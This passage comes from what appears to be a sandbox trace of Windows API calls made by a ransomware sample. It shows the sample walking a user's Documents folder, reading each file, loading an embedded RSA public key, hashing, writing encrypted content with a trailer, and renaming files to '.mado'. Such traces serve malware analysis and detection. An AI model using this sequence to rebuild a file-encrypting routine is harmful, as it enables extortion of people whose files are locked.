Size=0x100) returned 0x3b72d90 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.153] GetCurrentThreadId () returned 0x600 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.153] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x821f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.153] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.154] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.154] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.154] CloseHandle (hObject=0x63c) returned 1 [0205.155] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\YnWruvpsOj2zx9x8a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\ynwruvpsoj2zx9x8a.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\YnWruvpsOj2zx9x8a.csv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\ynwruvpsoj2zx9x8a.csv.mado")) returned 1 [0205.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.156] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.157] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 1 [0205.157] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\_Kde0C7n4syUZ.ots") returned=".ots" [0205.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\_Kde0C7n4syUZ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\_kde0c7n4syuz.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.157] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=67763) returned 1 [0205.157] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.159] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1088d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.160] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.161] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x108b3, lpOverlapped=0x0) returned 1 [0205.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.162] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.163] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.163] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.163] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.163] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.163] GetLastError () returned 0x0 [0205.163] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.163] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.163] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.163] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.163] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.163] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe700 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe730 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe700 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe6e8 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe700 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.164] GetCurrentThreadId () returned 0x600 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b688e8 [0205.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.165] GetCurrentThreadId () returned 0x600 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe730 [0205.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe700 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6d0 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe748 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe748 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe700 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6d0 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6b8 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81428 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.168] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x108ae, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x108ae, lpOverlapped=0x0) returned 1 [0205.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.169] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x108b3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.169] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.169] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: 